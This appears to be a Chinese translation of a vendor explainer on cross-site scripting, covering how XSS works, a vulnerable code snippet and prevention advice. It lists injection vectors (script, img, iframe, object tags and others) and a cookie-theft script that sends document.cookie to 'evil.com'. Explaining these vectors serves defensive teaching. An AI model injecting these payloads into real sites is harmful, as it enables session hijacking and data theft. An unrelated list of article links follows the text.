跨站点脚本 (XSS)
跨站点脚本 (XSS)
跨站点脚本 (XSS) 是客户端代码注入攻击。攻击者旨在通过在合法的网页或 Web 应用程序中包含恶意代码,在受害者的 Web 浏览器中执行恶意脚本。当受害者访问执行恶意代码的网页或 Web 应用程序时,将发生实际攻击。网页或 Web 应用程序成为向用户浏览器传递恶意脚本的工具。通常用于跨站点脚本攻击的易受攻击的车辆是允许注释的论坛、留言板和网页。
如果网页或 Web 应用程序在生成的输出中使用未消毒的用户输入,它很容易受到 XSS 的影响。然后,受害者的浏览器必须分析此用户输入。XSS 攻击在 VBScript、ActiveX、闪存甚至 CSS 中是可能的。但是,它们在 JavaScript 中是最常见的,主要是因为 JavaScript 是大多数浏览体验的基本内容。
跨站点脚本不是用户的问题吗?
如果攻击者可以滥用网页上的 XSS 漏洞在用户的浏览器中执行任意 JavaScript,则该易受攻击的网站或易受攻击的 Web 应用程序及其用户的安全已受到损害。XSS 不像任何其他安全漏洞那样是用户的问题。如果它影响您的用户,它会影响您。
跨站点脚本也可用于污损网站,而不是以用户为目标。攻击者可以使用注入的脚本更改网站内容,甚至将浏览器重定向到另一个网页,例如包含恶意代码的网页。
攻击者可以使用 JavaScript 做什么?
XSS 漏洞被认为比 SQL 注入漏洞危险性要小。在网页上执行 JavaScript 的能力的后果一开始可能看起来并不可怕。大多数 Web 浏览器在严格控制的环境中运行 JavaScript。JavaScript 对用户的操作系统和用户文件的访问权限有限。但是,如果作为恶意内容的一部分被误用,JavaScript 仍然可能很危险:
- 恶意 JavaScript 有权访问网页其余部分有权访问的所有对象。这包括访问用户的 Cookie。Cookie 通常用于存储会话令牌。如果攻击者可以获取用户的会话 Cookie,他们可以模拟该用户,代表用户执行操作,并访问用户的敏感数据。
- JavaScript 可以读取浏览器 DOM 并任意修改它。幸运的是,这只能在运行 JavaScript 的页面中实现。
- JavaScript 可以使用 对象将具有任意内容的 HTTP 请求发送到任意目标。XMLHttpRequest
- 现代浏览器中的 JavaScript 可以使用 HTML5 API。例如,它可以从用户的文件系统访问用户的地理位置、网络摄像头、麦克风,甚至特定文件。这些 API 中大多数都需要用户选择加入,但攻击者可以使用社交工程来绕过这一限制。
上述内容与社会工程相结合,允许犯罪分子进行高级攻击,包括 Cookie 盗窃、种植木马、密钥记录、网络钓鱼和身份盗窃。XSS 漏洞为将攻击升级为更严重的攻击提供了完美的基础。跨站点脚本也可以与其他类型的攻击结合使用,例如,跨站点请求伪造 (CSRF)。
有几种类型的跨站点脚本攻击:存储/持久 XSS、反射/非持久性 XSS和基于 DOM的 XSS。您可以在一篇题为"XSS类型"的文章中阅读更多关于它们的文章。
跨站点脚本的工作原理
典型的 XSS 攻击有两个阶段:
- 若要在受害者的浏览器中运行恶意 JavaScript 代码,攻击者必须首先找到一种将恶意代码(有效负载)注入受害者访问的页面的方法。
- 之后,受害者必须访问包含恶意代码的网页。如果攻击针对特定受害者,攻击者可以使用社交工程和/或网络钓鱼向受害者发送恶意 URL。
为了可能执行第 1 步,易受攻击的网站需要在其页面中直接包含用户输入。然后,攻击者可以插入将在网页中使用的恶意字符串,并将其视为受害者的浏览器的源代码。XSS 攻击也有一些变体,攻击者使用社交工程诱使用户访问 URL,而有效负载是用户单击的链接的一部分。
以下是服务器端伪代码的代码段,用于在网页上显示最新的注释:
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
上述脚本只是从数据库中删除最新的注释,并包含在 HTML 页面中。它假定打印出的注释仅包含文本,不包含 HTML 标记或其他代码。它容易受到 XSS 的攻击,因为攻击者可能会提交包含恶意负载的注释,例如:
<script>doSomethingEvil();</script>
Web 服务器向访问此网页的用户提供以下 HTML 代码:
<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>
当页面在受害者的浏览器中加载时,攻击者的恶意脚本将执行。多数情况下,受害者没有意识到这一点,无法防止这种攻击。
使用 XSs 窃取饼干
犯罪分子经常使用 XSS 窃取饼干。这允许他们冒充受害者。攻击者可以通过多种方式将 Cookie 发送到自己的服务器。其中之一是执行以下客户端脚本在受害者的浏览器中:
<script>
window.location="http://evil.com/?cookie=" + document.cookie
</script>
下图说明了简单 XSS 攻击的分步演练。
- 攻击者通过提交包含恶意 JavaScript 内容的易受攻击表单,将有效负载注入网站的数据库。
- 受害者从 Web 服务器请求网页。
- Web 服务器为受害者的浏览器提供攻击者的有效负载,作为 HTML 正文的一部分。
- 受害者的浏览器执行 HTML 正文中包含的恶意脚本。在这种情况下,它会将受害者的 Cookie 发送到攻击者的服务器。
- 当 HTTP 请求到达服务器时,攻击者现在只需提取受害者的 Cookie。
- 攻击者现在可以使用受害者的被盗 Cookie 进行模拟。
若要详细了解 XSS 攻击是如何进行的,请参阅一篇题为"跨站点脚本综合教程"的文章。
跨站点脚本攻击矢量
以下是攻击者可能通过 XSS 攻击危害网站或 Web 应用程序安全性的通用 XSS 攻击媒介列表。OWASP 组织维护了更广泛的 XSS 有效负载示例列表:XSS 筛选器逃避备忘单。
<脚本> 标记
标记是最直接的 XSS 有效负载。标记可以引用外部 JavaScript 代码,也可以将代码嵌入到标记本身中。<script>scriptscript
<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>
JavaScript 事件
JavaScript 事件属性(如 和)可用于许多不同的标记。这是一个非常流行的XSS攻击媒介。onloadonerror
<!-- onload attribute in the <body> tag -->
<body οnlοad=alert("XSS")>
<正文> 标签
通过使用事件属性(如上文)或其他更模糊的属性(如属性),可以在 内部传递 XSS 有效负载。<body>background
<!-- background attribute -->
<body background="javascript:alert("XSS")">
<img> 标签
某些浏览器执行属性中的 JavaScript。<img>
<!-- <img> tag XSS -->
<img src="javascript:alert("XSS");">
<!-- tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
<iframe> 标记
该标记允许您在当前页面中嵌入另一个 HTML 页面。IFrame 可能包含 JavaScript,但 IFrame 中的 JavaScript 由于浏览器的内容安全策略 (CSP) 而无法访问父页面的 DOM。但是,IFrames 在摆脱网络钓鱼攻击方面仍然非常有效。<iframe>
<!-- <iframe> tag XSS -->
<iframe src="http://evil.com/xss.html">
<输入> 标记
在某些浏览器中,如果标记的属性设置为 ,则可以对其进行操作以嵌入脚本。type<input>image
<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">
<link> 标签
该标记通常用于链接到外部样式表,可能包含脚本。<link>
<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">
<表> 标记
可以利用 和 标记的背景属性来引用脚本而不是图像。<table><td>
<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">
<div> 标签
该标记类似于 <table> 和标记,还可以指定背景并因此嵌入脚本。<div><td>
<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">
<对象> 标记
可用于包含来自外部站点的脚本。<object> tag
<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
您的网站或 Web 应用程序是否容易受到跨站点脚本的影响
跨站点脚本漏洞是最常见的 Web 应用程序漏洞之一。OWASP 组织(开放 Web 应用程序安全项目)将2017 年 OWASP 前 10 名文档中的 XSS漏洞作为第二大问题。
幸运的是,通过使用 Acunetix 漏洞扫描程序(包括专门的 XSS 扫描仪)运行自动 Web 扫描,可以轻松测试您的网站或 Web应用程序是否容易受到 XSS 和其他漏洞的影响。参加演示,详细了解如何针对您的网站或 Web 应用程序运行 XSS 扫描。以下文章:如何检测盲 XSS 漏洞,了解如何使用 Acunetix检测盲 XSS 漏洞。
如何防止 XSS
为了保护自己免受 XSS 的检查,您必须对输入进行消毒。应用程序代码不应将作为输入接收的数据直接输出到浏览器,而不检查其是否为恶意代码。
有关详细信息,请参阅以下文章:防止 XSS 攻击以及如何防止基于 DOM 的跨站点脚本。您还可以在 OWASP 组织维护的 XSS 预防备忘单中找到有用的信息。
如何防止跨站点脚本 (XSS) = 通用提示
防止跨站点脚本 (XSS) 并非易事。特定的预防技术取决于 XSS 漏洞的子类型、用户输入使用上下文以及编程框架。但是,为了保持 Web 应用程序的安全,应遵循某些一般战略原则。
第 1 步:训练并保持意识 为保证 Web 应用程序的安全,参与构建 Web 应用程序的每个人都必须了解与 XSS 漏洞相关的风险。您应该为所有开发人员、QA 员工、DevOps 和 SysAdmins 提供合适的安全培训。您可以首先将它们引用到此页面。 | |
第 2 步:不信任任何用户输入 将所有用户输入视为不受信任的输入。用作 HTML 输出一部分的任何用户输入都引入了 XSS 的风险。像对待公共输入一样对待来自经过身份验证的和/或内部用户的输入。 | |
第 3 步:使用转义/编码 根据用户输入的用法位置使用适当的转义/编码技术:HTML 转义、JavaScript 转义、CSS 转义、URL 转义等。使用现有库进行转义,除非绝对必要,否则不要编写自己的库。 | |
第 4 步:使 HTML 消毒 如果用户输入需要包含 HTML,则无法转义/编码它,因为它会破坏有效的标记。在这种情况下,请使用受信任和验证的库来解析和清理 HTML。根据您的开发语言选择库,例如,用于 .NET 的 Html Sanitizer 或 Rails 上的 Ruby 的 Sanitize 帮助器。 | |
第 5 步:设置 HttpOnly 标志 若要减轻可能的 XSS 漏洞的后果,请为 Cookie 设置 HttpOnly 标志。如果这样做,则无法通过客户端 JavaScript 访问此类 Cookie。 |
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 让模态浮出水面的S2 刘易斯逻辑之八
标题 让模态浮出水面的S2 刘易斯逻辑之八 这个S2,大概可以让我们对模态逻辑有点感觉了。刘易斯的S1,虽然把“可能”作为它的初始符号,但直到接近S1尾声的时候才付诸讨论。当他把那个一致性公设放进他的S1的时候,S1就不能称作S1,而应该称作他命名的S2了。因为S1包括不了这…...
2024/5/9 15:11:21 - 虚拟机(vmware)下如何安装linux操作系统
1.安装vmware软件下载VMware软件VMware-workstation-full-11.0.0-2305329keygen vm11先安装vmware程序,安装完后先不要启动,再安装破解补丁2.验证VMWARE是否安装成功(有些机器在安装vmware的时候会出现一个错误:virtual XT,这需要重启电脑<按F2/按DELET/.........>进…...
2024/5/9 14:41:10 - jar中没有主清单属性【解决办法】
<main><script type="text/javascript"> var blogSensitiveWords = "";jar中没有主清单属性【解决办法】</div><div class="up-time"><span>最后发布:2020-03-25 11:07:40</span><span>首次发布:20…...
2024/4/13 3:55:47 - 【CV-Paper 12】图像分割 01:FCN-2014
论文原文:点击此处 论文下载:点击此处 论文被引:14541 论文年份:2014 论文代码:点击此处顾名思义,fully convolutional networks 就是全卷积网络,那么它与传统的神经网络架构有什么区别?没有全连接层,只有卷积层,有时还有池化层组成; 输入图像,输出也是图像,而不是…...
2024/5/9 11:43:11 - 【2021届】Java面试复习提纲
该文章主要是作为一个Java复习的提纲,采用的并不是对每一个知识点进行讲解的形式,它的目的很纯粹,就是为了检测自己的掌握程度,针对面试题目复习,如果掌握不够好,建议先去专栏学习:面试复习专栏 你可以将其作为模拟面试的问题来源,测试你的熟练程度;也可以当作面试前的…...
2024/4/27 17:14:41 - 极客大学架构师训练营 大数据可视化、机器学习、PageRank算法、KNN分类算法、贝叶斯分类算法、推荐引擎算法、感知机、神经网络 第26课 听课总结
说明 讲师:首席架构师 李智慧 大数据可视化 数据大屏互联网运营常用数据指标 新增用户数 新增用户数是网站增长性的关键指标,指新增加的访问网站的用户数(或者新下载 App 的用户数),对于一个处于爆发期的网站,新增用户数在短期内出现倍增的走势,是网站的战略机遇期,很多…...
2024/4/18 15:54:28 - 【学员心得】如何三招通关云计算HCIE认证
哈喽~大家好! 我是誉天云计算晚班的刘同学,前不久我成功的考到了华为云计算HCIE认证,收到成绩的时候,还是蛮激动的。初识HCIE 我是计算机网络专业出身,了解HCIE、CCIE等认证的时间也比较早。但是在遇到誉天之前,对云计算这三个字还并没有太多的概念。不过幸运的是,和誉天…...
2024/4/20 6:04:59 - 梁耀婵 HLF-间联祖细胞微脂丰胸
梁耀婵 HLF-间联祖细胞微脂丰胸 梁耀婵院长结合24年脂肪专项临床经验。应用自主研发的“联保取脂”技术,通过800目多次物理筛选配合超临界流体压力探取的微脂祖细胞,再经过专利多维度脂肪转移器精准快速将脂肪集落在移植处,实现丰胸+体雕=一举两得。技术核心:ULP祖细胞微脂…...
2024/3/6 7:54:53 - healthCode
项目整体结构配置文件:web.xml, spring.xml, springmvc.xml, mybatis.xml包:controller, dto, service, dao, domainweb.xml<!-- 注册ServletContextListener监听器。当ServletContext被创建时,该监听器会根据spring.xml创建出root ioc容器 --> <listener> &l…...
2024/4/24 4:18:01 - 个人如何发展初稿 - 三国论
赵云: 我想说的是,一个人的成长与环境的关系非常大 刘备: 然后? 赵云: 这就是需要好的平台吗 刘备: 是材料才行 赵云: 然后,如何才能进去这个平台呢 刘备: 都说了。是材料才行。没有尽头,欲望就是不断的膨胀。断不了 赵云: 是的 赵云: 如何顺着平台一步一步往上爬 …...
2024/4/25 19:47:05 - 10-30-010-安全简介-Kafka 安全机制
文章目录1.视界1. 概述2. Kafka身份认证KafkaClient 配置Kafka权限控制权限的内容权限配置权限设置add 操作为用户 alice 在 topic_lcc(topic)上添加读写的权限list 操作remove 操作"producer 和 consumer 的操作")producer 和 consumer 的操作填坑...
2024/5/6 19:16:07 - 马工程西方经济学上册第2版题库考研真题精选章节题库
内容第一部分 考研真题精选一、名词解释1基尼系数[中央财经大学2017研;中南财经政法大学2019研]答:基尼系数是意大利经济学家基尼根据洛伦兹曲线于1922年提出的定量测定收入分配差异程度的指标。它的经济含义是:在全部居民收入中用于不平均分配的百分比。基尼系数最小等于0…...
2024/4/18 16:48:33 - 微观经济学考研真题及答案(二)
微观经济学考研真题及答案(二)想看资料更多内容,请上知择学习网上搜索【微观经济学】!...
2024/4/18 10:41:24 - 高学历能否在计算机行业发展吗?
我在银行做了多年运行操作部。说是在技术部门工作,但是自感非常惭愧十几年工作经验,只是简单负责机器运行维护,无任何技术可言。每周晚班工作,简单输出心态已经麻木,没有挑战性可言。记得去年我们部门一位运行操作员,年轻大学期间已经是党员,本科学历虽然他的学校只是三…...
2024/3/31 1:58:46 - 汇编和可执行文件
程序执行过程:因为软件和硬件之间隔着一个操作系统,我们将我们写好的源代码编译生成了汇编代码,但是不可执行,因为不同的操作系统操作要求不同,这时我们就需要通过链接生成可执行文件来实现不同操作系统需要的要求。可以将源代码理解为是生猪,编译的过程就相当宰杀,汇编…...
2024/3/31 0:37:14 - 从SRCNN到EDSR,总结深度学习端到端超分辨率方法发展历程(转)
超分辨率技术(Super-Resolution, SR)是指从观测到的低分辨率图像重建出相应的高分辨率图像,在监控设备、卫星图像和医学影像等领域都有重要的应用价值。本文针对端到端的基于深度学习的单张图像超分辨率方法(Single Image Super-Resolution, SISR),总结一下从SRCNN到EDSR的…...
2024/4/19 1:46:21 - rosbag录制与回放数据
rosbag录制与回放数据参考网站1运行小乌龟2 rosbag record 录制2.1 录制全部话题2.2 录制某个或某几话题3 rosbag play数据回放等几秒再回放改变消息回放速率 参考网站 cn/ROS/Tutorials/Recording and playing back data - ROS Wiki 1运行小乌龟 启动两个节点——一个turtles…...
2024/3/31 2:32:15 - c++01背包、完全背包、多重背包思路+代码
今天蒟蒻来给大家讲01背包、完全背包、多重背包的思路和代码 一.先来区分一下这三种背包的区别 01背包:有N件物品和一个容量为V的背包。(每种物品均只有一件)第i件物品的费用是c[i],价值是w[i]。求解将哪些物品装入背包可使价值总和最大。 完全背包:有N种物品和一个容量为…...
2024/3/31 4:10:29 - 初学爬虫(5)——Beautiful Soup库基础
今天正式公布开学时间了,放了大半年的假期,终于快结束了。然而回去就要期末考试,看着还未动过的课本,还没开始复习(预习)啊!!!Beautiful Soup库用于解析HTML页面,可用于标记和提取信息。在其官网https://www.crummy.com/software/BeautifulSoup/上的介绍如下:翻译为…...
2024/4/23 18:01:42 - 【Kafka】Flink kafka 报错 Failed to send data to Kafka: Failed to allocate memory within the config
1.背景 [2020-09-05 14:57:51] [INFO] [org.apache.flink...
2024/4/19 6:27:43
最新文章
- toB、toC、toD、B2B、C2C、O2O、B2C、P2P到底是什么?
toB、toC、toD到底是什么? toB(Business):面向企业用户,例如OA办公系统 toC(Consumer):主要是面向个人、客户,例如王者荣耀 toD(Developer)&…...
2024/5/9 20:57:21 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/5/7 10:36:02 - spark on hive
由于spark不存在元数据管理模块,为了能方便地通过sql操作hdfs数据,我们可以通过借助hive的元数据管理模块实现。对于hive来说,核心组件包含两个: sql优化翻译器,翻译sql到mapreduce并提交到yarn执行metastore…...
2024/5/8 2:36:25 - 触想四代ARM架构工业一体机助力手功能康复机器人应用
一、行业发展背景 手功能康复机器人是医疗机器人的一个分支,设计用于帮助肢体障碍患者进行手部运动和力量训练,在医疗健康领域有着巨大的成长空间。 手功能康复机器人融合了传感、控制、计算、AI视觉等智能科技与医学技术,能够帮助患者改善康…...
2024/5/6 18:24:45 - 416. 分割等和子集问题(动态规划)
题目 题解 class Solution:def canPartition(self, nums: List[int]) -> bool:# badcaseif not nums:return True# 不能被2整除if sum(nums) % 2 ! 0:return False# 状态定义:dp[i][j]表示当背包容量为j,用前i个物品是否正好可以将背包填满ÿ…...
2024/5/8 19:32:33 - 【Java】ExcelWriter自适应宽度工具类(支持中文)
工具类 import org.apache.poi.ss.usermodel.Cell; import org.apache.poi.ss.usermodel.CellType; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.ss.usermodel.Sheet;/*** Excel工具类** author xiaoming* date 2023/11/17 10:40*/ public class ExcelUti…...
2024/5/9 7:40:42 - Spring cloud负载均衡@LoadBalanced LoadBalancerClient
LoadBalance vs Ribbon 由于Spring cloud2020之后移除了Ribbon,直接使用Spring Cloud LoadBalancer作为客户端负载均衡组件,我们讨论Spring负载均衡以Spring Cloud2020之后版本为主,学习Spring Cloud LoadBalance,暂不讨论Ribbon…...
2024/5/9 2:44:26 - TSINGSEE青犀AI智能分析+视频监控工业园区周界安全防范方案
一、背景需求分析 在工业产业园、化工园或生产制造园区中,周界防范意义重大,对园区的安全起到重要的作用。常规的安防方式是采用人员巡查,人力投入成本大而且效率低。周界一旦被破坏或入侵,会影响园区人员和资产安全,…...
2024/5/8 20:33:13 - VB.net WebBrowser网页元素抓取分析方法
在用WebBrowser编程实现网页操作自动化时,常要分析网页Html,例如网页在加载数据时,常会显示“系统处理中,请稍候..”,我们需要在数据加载完成后才能继续下一步操作,如何抓取这个信息的网页html元素变化&…...
2024/5/9 3:15:57 - 【Objective-C】Objective-C汇总
方法定义 参考:https://www.yiibai.com/objective_c/objective_c_functions.html Objective-C编程语言中方法定义的一般形式如下 - (return_type) method_name:( argumentType1 )argumentName1 joiningArgument2:( argumentType2 )argumentName2 ... joiningArgu…...
2024/5/9 5:40:03 - 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】
👨💻博客主页:花无缺 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 本文由 花无缺 原创 收录于专栏 【洛谷算法题】 文章目录 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】🌏题目描述🌏输入格…...
2024/5/9 7:40:40 - 【ES6.0】- 扩展运算符(...)
【ES6.0】- 扩展运算符... 文章目录 【ES6.0】- 扩展运算符...一、概述二、拷贝数组对象三、合并操作四、参数传递五、数组去重六、字符串转字符数组七、NodeList转数组八、解构变量九、打印日志十、总结 一、概述 **扩展运算符(...)**允许一个表达式在期望多个参数࿰…...
2024/5/8 20:58:56 - 摩根看好的前智能硬件头部品牌双11交易数据极度异常!——是模式创新还是饮鸩止渴?
文 | 螳螂观察 作者 | 李燃 双11狂欢已落下帷幕,各大品牌纷纷晒出优异的成绩单,摩根士丹利投资的智能硬件头部品牌凯迪仕也不例外。然而有爆料称,在自媒体平台发布霸榜各大榜单喜讯的凯迪仕智能锁,多个平台数据都表现出极度异常…...
2024/5/9 1:35:21 - Go语言常用命令详解(二)
文章目录 前言常用命令go bug示例参数说明 go doc示例参数说明 go env示例 go fix示例 go fmt示例 go generate示例 总结写在最后 前言 接着上一篇继续介绍Go语言的常用命令 常用命令 以下是一些常用的Go命令,这些命令可以帮助您在Go开发中进行编译、测试、运行和…...
2024/5/9 4:12:16 - 用欧拉路径判断图同构推出reverse合法性:1116T4
http://cplusoj.com/d/senior/p/SS231116D 假设我们要把 a a a 变成 b b b,我们在 a i a_i ai 和 a i 1 a_{i1} ai1 之间连边, b b b 同理,则 a a a 能变成 b b b 的充要条件是两图 A , B A,B A,B 同构。 必要性显然࿰…...
2024/5/9 7:40:35 - 【NGINX--1】基础知识
1、在 Debian/Ubuntu 上安装 NGINX 在 Debian 或 Ubuntu 机器上安装 NGINX 开源版。 更新已配置源的软件包信息,并安装一些有助于配置官方 NGINX 软件包仓库的软件包: apt-get update apt install -y curl gnupg2 ca-certificates lsb-release debian-…...
2024/5/9 19:47:07 - Hive默认分割符、存储格式与数据压缩
目录 1、Hive默认分割符2、Hive存储格式3、Hive数据压缩 1、Hive默认分割符 Hive创建表时指定的行受限(ROW FORMAT)配置标准HQL为: ... ROW FORMAT DELIMITED FIELDS TERMINATED BY \u0001 COLLECTION ITEMS TERMINATED BY , MAP KEYS TERMI…...
2024/5/9 7:40:34 - 【论文阅读】MAG:一种用于航天器遥测数据中有效异常检测的新方法
文章目录 摘要1 引言2 问题描述3 拟议框架4 所提出方法的细节A.数据预处理B.变量相关分析C.MAG模型D.异常分数 5 实验A.数据集和性能指标B.实验设置与平台C.结果和比较 6 结论 摘要 异常检测是保证航天器稳定性的关键。在航天器运行过程中,传感器和控制器产生大量周…...
2024/5/9 1:42:21 - --max-old-space-size=8192报错
vue项目运行时,如果经常运行慢,崩溃停止服务,报如下错误 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 因为在 Node 中,通过JavaScript使用内存时只能使用部分内存(64位系统&…...
2024/5/9 5:02:59 - 基于深度学习的恶意软件检测
恶意软件是指恶意软件犯罪者用来感染个人计算机或整个组织的网络的软件。 它利用目标系统漏洞,例如可以被劫持的合法软件(例如浏览器或 Web 应用程序插件)中的错误。 恶意软件渗透可能会造成灾难性的后果,包括数据被盗、勒索或网…...
2024/5/9 4:31:45 - JS原型对象prototype
让我简单的为大家介绍一下原型对象prototype吧! 使用原型实现方法共享 1.构造函数通过原型分配的函数是所有对象所 共享的。 2.JavaScript 规定,每一个构造函数都有一个 prototype 属性,指向另一个对象,所以我们也称为原型对象…...
2024/5/9 16:54:42 - C++中只能有一个实例的单例类
C中只能有一个实例的单例类 前面讨论的 President 类很不错,但存在一个缺陷:无法禁止通过实例化多个对象来创建多名总统: President One, Two, Three; 由于复制构造函数是私有的,其中每个对象都是不可复制的,但您的目…...
2024/5/8 9:51:44 - python django 小程序图书借阅源码
开发工具: PyCharm,mysql5.7,微信开发者工具 技术说明: python django html 小程序 功能介绍: 用户端: 登录注册(含授权登录) 首页显示搜索图书,轮播图࿰…...
2024/5/9 6:36:49 - 电子学会C/C++编程等级考试2022年03月(一级)真题解析
C/C++等级考试(1~8级)全部真题・点这里 第1题:双精度浮点数的输入输出 输入一个双精度浮点数,保留8位小数,输出这个浮点数。 时间限制:1000 内存限制:65536输入 只有一行,一个双精度浮点数。输出 一行,保留8位小数的浮点数。样例输入 3.1415926535798932样例输出 3.1…...
2024/5/9 4:33:29 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
